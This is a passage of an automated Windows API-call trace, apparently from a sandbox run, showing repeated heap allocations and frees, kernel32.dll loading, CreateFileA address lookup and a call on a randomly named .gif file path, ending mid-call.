[0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0164.522] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0164.522] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.522] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0164.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0164.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0164.522] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0164.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0164.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0164.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0164.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0164.523] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0164.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0164.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.526] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0164.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.529] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0164.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd810 [0164.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd810, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0164.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.530] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0164.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.530] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0164.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, 